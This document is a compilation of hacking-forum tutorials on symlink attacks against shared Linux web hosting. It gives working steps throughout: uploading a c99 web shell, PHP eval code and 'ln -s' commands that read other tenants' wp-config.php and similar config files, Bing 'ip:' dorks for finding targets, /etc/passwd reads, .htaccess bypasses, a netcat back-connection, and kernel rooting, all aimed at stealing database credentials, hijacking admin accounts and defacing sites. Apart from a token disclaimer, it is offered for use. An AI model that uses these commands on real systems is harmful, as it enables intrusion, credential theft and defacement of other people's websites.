Private Symlink(PHP) Exploit Tutorial

First of all we use Symlink function to make a shortcut for any file or folder we want

that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the slave's database If and only if the slave is in a shared host


Download the below Shell & Follow the steps.

================================================== ==============
Get Any C99 Shell
================================================== ==============

/Step 1 $ Upload the php i.e Shell_Silic0n.php

Shell on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

================================================== ==============================​==
http://www.yoursitename.com/shell_Silic0n.php
================================================== ==============================​==


/Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";<br />@unlink($flib);<br /><br />!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!!<br /><br />/Step 4 $ You should replace (xx) in the code in the upper two lines.<br /><br />In the 1st xx in the line one, means the target username.<br /><br />In the 2nd xx.xx in the line one, means the target file full path in other word it's<br /><br />usually used to read database configuration files to to steel it's connection information.<br /><br />xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"<br /><br />$writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,<br /><br />and write the output.For @unlink you can search for them on php.net </span>

Symlink (PHP) Exploit

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+
Tutorial Name: Symlink (PHP) Exploit [Private (PhP Code)For Sometimes]
Author: dREviL
*Dont Share without credits*
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+
First of all we use symlink to read config file of other sites hosted in the same servers . Symlinkung can be done in many methods , and today i will show a new one that was private for sometimes and now its shared . In this tuto we will excecute a php(Eval Code) to symlink in a shared hosting . Let'Begin .We need a shell that allwows php eval code excecuting. First we get the full path of root /home/r00tb0x/public_html .And now the php code

Code:

$filepath='/home/username/public_html/txtfile';
$sitepath='/home/edit/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";<br /> @unlink($flib);</code></div></div> Now lets Edit Some Lines Of The Code.In the $filepath='/home/username/public_html/txtfile'; replace username with the username of the target website hosted in the same server...Then replace the txtfile with the txt file.txt u created for reading config..$writeblefilepath here u must enter ur writable path..From here u will be able to explore other sites hosted in the same server ..<br /><br />Hope u Understand me !!!

How to symlink on a linux server [TuT] [Website hacking !!]

How to symlink ? (TUTORIAL)

Written by -ThatGuy- for begginer webhackers.

NOTE : I do not take any responsibility for your actions. This was written for educational purposes only ! Also sorry for my bad english !

Hello HackForums.
Today i'll try to help begginer webhackers by teaching them a method called symlink.

What is symlink ?
Symlink is a method used by hackers to read files from other users on a linux server, only by using a php-shell.

So what do we require to start the tutorial :

Requirements :

- a phpshell uploaded in a linux server (Safe MODE = OFF )
- a target site
- basic phpshell & linux knowledge
- a brain !

Let's start by the tutorial.

Where to get a target, if you only have a phpshell uploaded in a linux server that has some sites ?
It's easy , first get the IP of the server.
Then go to bing.com and search like that :

Code:

ip:xx.xxx.xxx.xxx vbulletin

xxx replace with the ip adress of the server , and 'vbulletin', you can change to a name of a forum software or a CMS you wish as a target. But for this example i'll take vBulletin.

OK , now we got the target site , let's suppose that its domain name is mytarget.com and it uses vBulletin forum software.

Now starts the real hacking !

Go to your phpshell , and in the 'Execute command' field , execute there that command :

Code:

ls -la /etc/valiases/mytarget.com

By executing this command , i'll get the name of the user (on the linux server) that keeps the website mytarget.com.
It should return with a result similar to that :

>>>>>>>-rw-r--r-- 1 target mail 28 May 28 2011 /etc/valiases/mytarget.com

The red colored piece is the user of mytarget.com on the server.
So in our case the username is 'target'

Many of us know that the configuration file of vBulletin script ,can be found in /includes/config.php.
This is the file we need to read in our case , in order to get access at our target site.
How can we read that file ?
Simple , execute that command on the shell :

Code:

ln -s /home/target/public_html/includes/config.php symlink.txt

As you can see, we're writting the content of config.php , into symlink.txt file.
After you execute the command , you will se a new file called symlink.txt.
Open it and w00t !! You successfully read the configuration file (symlinked).
Now , just get an MySQL connector script coded in PHP , and login with the details you get from configuration file of your target.Then at the admin table, get the admin's hash and crack it , or better , change the admin's email you yours , and then do a forgot password at mytarget.com
And then you successfully will get full access in your target site !

That was all ,very easy if you practice many times. Maybe soon i will make a video tutorial if you still didn't understand , just request the video tut in the comments , and i will try ASAP to make it for you !

Thanks for reading , -ThatGuy- !

shrimlinking

++ ++
~*^...Symlink(PHP) Exploit Tutorial by Indian Cyber Army...^*~
++ ++

First of all we use Symlink function to make a shortcut for any file or folder we want

that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the slave's database If and only if the slave is in a shared host

Download the below Shell & Follow the steps.

== ==
Get Any C99 Shell
== ==

/Step 1 $ Upload the php i.e Shell_ica.php

Shell on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

== ==​==
http://www.yoursitename.com/shell_ica.php
== ==​==

/Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.

!! !!​!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";<br />@unlink($flib);<br /><br />!! !!​!!!!<br /><br />/Step 4 $ You should replace (xx) in the code in the upper two lines.<br /><br />In the 1st xx in the line one, means the target username.<br /><br />In the 2nd xx.xx in the line one, means the target file full path in other word it's<br /><br />usually used to read database configuration files to to steel it's connection information.<br /><br />xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"<br /><br />$writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,<br /><br />and write the output.For @unlink you can search for them on php.net .<br /><br />|<br /><br />|<br /><br />|<br /><br />|<br /><br />__- -- - -- - - -- - --- - -- - -- - -- -<br /><br />THE END..

Symlink Tutorial

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++
[+]Tutorial Name: How To Symlink +
[+]Tutorial By dR.EviL +
[+]Writed For # Members +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++
[#]Tools For This Tutorial +
[+]A SHell Upload In The Server +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++
Symlink is used to get admin access to your target website hosted in the same server. With Symlink you can bypass the security of server , and read the files of other users in the linux server. So if we have uploaded a shell in the server of target website , but in another user , we can easily read the configuration file of our target . First the shell is needed to symlink .
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++++++++++++++++

First Step Is To Get the user name of the target website in the server , To do this excecute this command

Code:

ls -la /etc/valiases/target.com ( Replace target.com with your target)

The Result Will Be :

Code:

target mail 15 jun 06 2011 /etc/valiases/the username of target.com

The Second Step Is:
Finding The configuration file :(
Below are Some Directions For Config Files In Different Cms..

Code:

In Joomla The Config File Will Be At /home/target/public_html/configuration.php
In WordPress The Config Will Be At /home/target/public_html/wp-config.php
In vBulletin The Config Will Be At /home/target/public_html/includes/config.php

Symliking In Joomla
Now we have to Read the config file to gett admin panel ! Follow This Steps ::::
1- Create a text file in your shelled website example: AL.txt
2- Then go to command execution field and execute that command :

Code:

ln -s /the target of config file AL.txt
examples:
ln -s /home/target/public_html/configuration.php AL.txt
ln -s /home/target/public_html/includes/config.php AL.txt
ln -s /home home/target/public_html/wp-config.php AL.txt

After you execute that command , just read the file AL.txt !
There is written the configuration file of ur target ! Get there the SQL database logins , and then manage its database , upload a MYSQL interface Then the MySQL database of the target website is in ur hands
If you wanna get into its administration , just edit some values there !

From vuln site to symlink

Now,first free ur time before reading this tutorial.This is a big tutorial ..so that u can learn and hack everything.

1. Introduction.
Most of the hackers who deface websites are script-kiddies, we're now going to take a look how hackers quickly detect vulnerable websites and deface other domains on the system.


2. SQL Injection.
Many people would take as a main the SQL Injection (SQLi) attack. SQLi is very popular and there are many dorks out there.


2.1 Searching for vulnerable websites.
The search is very easy. We just put the dork and try diffrent search results. For quicker results you may use the exploit scanner.

2.2 I want to attack a specific website which is on a shared hosting.
Again the search is very easy. Let's say we have the IP 69.162.119.226 with no malicious thoughts on it, of course. We navigate to:

http://www.bing.com

In the search field write:

Code:
ip:69.162.119.226 id=


You should get very interesting results which you might attack.


3. Attacking the web application itself.

A very good method to gain access is to attack the web application itself. Even if the websites' web application is up-to-update and you aren't able to exploit it, you can search for vulnerable web applications on the server itself. We'll be using the same method as in the 2.2 .

Let's say we have again the IP 69.162.119.226 with no malicious thoughts on it, of course. We navigate to:

http://www.bing.com

In the search field write:

Code:
ip:69.162.119.226 "wordpress"


You should get websites powered by wordpress or any other system you have a working exploit on.

4. I've got admin access, now what ?

After you've got admin access, upload a shell.

5. I've got a shell, now what ?

Now it's time to take down your target. You can either:
- Root the server.
- Get the victims' website configuration database.


5.1 Rooting the server.
First we need to disable the security. There is a good tutorial in this forum, follow it and you'll be fine.

Second we need a back-connection OR we can bind a port. A back connection means that the server connects to you after you have opened the specific port and have launched netcat to listen ( nc -l -v -p PORT ) . Locus shell provides a great interface for begginers. Just upload locus, after which go to back-connection OR bind shell and follow the instructions.


5.1.1 Pwning the kernel.
One of the most popular ways to root a web server is by pwning the kernel if it's a Linux box. To find out the kernel version simply type "uname -a" on your back/bind connection to/from the server. After you've got the version try finding a local root exploit for it. If you can't find, don't give up ... try harder ...

Code:
http://www.exploit-db.com/local/



5.1.2 Getting the victims' database configuration file.

Many of you have heard of "symlinking" . This is actually something like a shortcut on the Windows OS except this term is used in the Linux/Unix Distributions. Symlinking is a necessity in order to the Linux/Unix box to run about 10 times faster. Without it the server will be really slow even with high hardware configuration , which is just pointless.

To get the configuration file, first find out what system is the slave using ( e.g. Wordpress, Joomla, vBulletin etc ). Now go to your shell ( you will have to had disabled the security ) and type in "cat etc/passwd" .

Etc/passwd file contains all usernames on the Linux/Unix box which are created when you get hosting ( usually that's the cpanel username ). Now to get this file you will have to have disabled the security. In this file the usernames aren't long as the domain ones, for e.g.

You have slave website hackers1.com
In etc/passwd this can refer to the username:
hack1, hak1, hac1, hckrs1, hrs1 etc

So spend some time figuring out the username. After you've got it it's time to get the database config file. You can see the default configuration files list here:

Code:
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php


After you've got your path, it's time to extract the db information.

Let's assume you're in directory /home/attacker1/public_html/shell.php , where shell.php is your shell and attacker1 is the username of some domain we've just compromised. Doesn't this ring the bell ? The path to the victims' hosting should be /home/victim1/public_html/ where victim1 is your victims' username. Let's execute this command on our shell, assuming the victims' system is vBulletin :

Code:
ln -s /home/victim1/public_html/includes/config.php victim1.txt


This command uses symlink and it tells the server "hey, give me the file /config.php and save it as victim1.txt" (symlinking) . Now when you navigate to attacker1.com/victim1.txt you should have their configuration file. Many administrators put some security on their forums/cmses so we're going to break them now ...


5.1.2.1 Htaccess.

The admin of the victim1.com website might have put this htaccess file in the /includes folder:


order allow, deny
deny from all


When we try to symlink this it will return in a 403 Forbidden Error. So how do we bypass this ? Easy. We create a folder e.g. "hack" . We navigate to "hack" by typing "cd /hack". Next we symlink like this:

Code:
ln -s /home/victim1/public_html/includes/config.php victim1.txt


and we get a 403 Forbidden error ... Now we put this htaccess file in a directory before "hack" for example we are in "/home/attacker1/public_html/hack" and we have to put this htaccess file (below) in "/home/victim1/public_html/" . The htaccess file you have to
put:

Code:
HeaderName victim1.txt


Now we navigate to "/home/attacker1/public_html/hack" and click "victim1.txt" and it should load us the configuration file. If you have done a symlink but with a different .txt file, replace your custom name in the htaccess as well e.g. I have done symlink:

Code:
ln -s /home/victim1/public_html/includes/config.php 1.txt


so I have to put htaccess:

HeaderName 1.txt


5.1.2.2 Browse Through Attack - Bypassing ALL Security.

Tired of bypassing everything step by step by step ? Now I'm going to show you a very cool method to bypass ALL security.

Take this scenario as example:

We have disabled all security. But still we can't symlink right. What do we do ?

First we create a folder with a custom named folder like "hack". We enter it via our shell and type in "ln -s / root" . Next we choose a slave domain like victim1.com . We type in " ls -la /etc/valiases/victim1.com ". Now we navigate one folder back and put this htaccess file in the "hack" folder:

Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php
AddHandler txt .php

Now if we are in "/home/attacker1/public_html/" this equals to "attacker1.com" . So we want to navigate to the "hack" folder and we type in the URL "attacker1.com/hack" and we see a "folder" which actually is a symlink called "root". Don't get too happy, we still have got restricted permissions to some folders. Now to "browse through" their hole hosting space we just navigate to "attacker1.com/hack/root/home/victim1/public_html/".

Fr34k1ng pwn3d . Now you can browse through his website without worrying about IP restrictions with htaccess file. Although if there is htaccess because of which you have to enter username and password, you have to find a way to bypass that yourself. OK so you're browsing through and you are in "/includes/" and you find "config.php". You click on it but it gives you a BLANK page. WTF ?! Not exactly. Right-click and select "view source" and the configuration file is there .


6. Is this is it ? Is it really this simple ?

Yes, this is it, nothing complicated. This is the way most hackers "deface", "root" or whatever they do to websites/forums.

`````````````````````````````````````````````````` `````````````````````````````````````````````````` ``````
now dont comment like 'cant understand ' ....read the tut again and again,u ill understand..


i hope all like this tutorial....rep if u like

Thanks to hackforums

if u put this tut anywhere,plz give credits..